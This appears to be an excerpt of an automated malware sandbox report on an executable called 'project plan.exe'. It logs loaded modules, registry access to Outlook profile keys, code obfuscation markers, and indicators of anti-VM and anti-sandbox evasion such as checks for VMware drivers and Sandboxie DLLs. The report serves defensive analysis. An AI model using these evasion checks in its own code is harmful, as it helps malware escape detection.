Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ifmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mprapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasmontr.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mfc42u.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: authfwcfg.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwpolicyiomgr.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: firewallapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dhcpcmonitor.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dot3cfg.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dot3api.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: onex.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: eappcfg.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: eappprxy.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwcfg.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: hnetmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netshell.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netsetupapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netiohlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: httpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshipsec.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: activeds.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: polstore.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winipsec.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: adsldpc.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: adsldpc.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshwfp.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: p2pnetsh.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: p2p.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rpcnsh.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: whhelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wlancfg.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wlanapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wshelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wevtapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: peerdistsh.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wcmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mobilenetworking.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ktmw32.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mprmsg.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: project plan.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: project plan.exe Static file information: File size 2939959 > 1048576
Source: project plan.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: project plan.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: System.Windows.Forms.pdb source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: mscorlib.pdb source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: System.ni.pdbRSDS source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: System.Drawing.pdb source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: System.Windows.Forms.ni.pdb source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: System.Drawing.pdbX source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: mscorlib.ni.pdb source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: System.Drawing.ni.pdb source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: System.Core.pdb source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: System.Windows.Forms.pdb; source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: System.Drawing.ni.pdbRSDS source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: System.Core.pdbH source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: System.ni.pdb source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: System.pdb source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: Microsoft.VisualBasic.pdb source: WERDE5D.tmp.dmp.7.dr
Source: Binary string: System.Core.ni.pdb source: WERDE5D.tmp.dmp.7.dr
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\project plan.exe Code function: 0_2_00007FF848F1816B push ebx; retn 5F4Eh 0_2_00007FF848F1826A
Source: C:\Users\user\Desktop\project plan.exe Code function: 0_2_00007FF848F12E65 push eax; ret 0_2_00007FF848F12E1D
Source: C:\Users\user\Desktop\project plan.exe Code function: 0_2_00007FF848F12D80 push eax; ret 0_2_00007FF848F12E1D
Source: C:\Users\user\Desktop\project plan.exe Code function: 0_2_00007FF848F100BD pushad ; iretd 0_2_00007FF848F100C1
Source: C:\Users\user\Desktop\project plan.exe Code function: 0_2_00007FF848FF01AA push esp; retf 4810h 0_2_00007FF848FF0312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_06169157 push es; ret 3_2_061692B8
Source: C:\Users\user\Desktop\project plan.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: project plan.exe PID: 1536, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\project plan.exe Memory allocated: 16754D70000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\project plan.exe Memory allocated: 1676E690000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: F60000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 2C70000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 2AB0000 memory reserve | memory write watch Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: Amcache.hve.7.dr Binary or memory string: VMware
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr Binary or memory string: VMware, Inc.
Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Amcache.hve.7.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARE
Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: Amcache.hve.7.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: Amcache.hve.7.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: RegAsm.exe, 00000003.00000002.3220966436.0000000000FC1000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000009.00000003.2042868359.0000000000831000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.7.dr Binary or memory string: vmci.sys
Source: Amcache.hve.7.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
Source: Amcache.hve.7.dr Binary or memory string: vmci.syshbin`
Source: project plan.exe, 00000000.00000002.2169883533.00000167566CC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
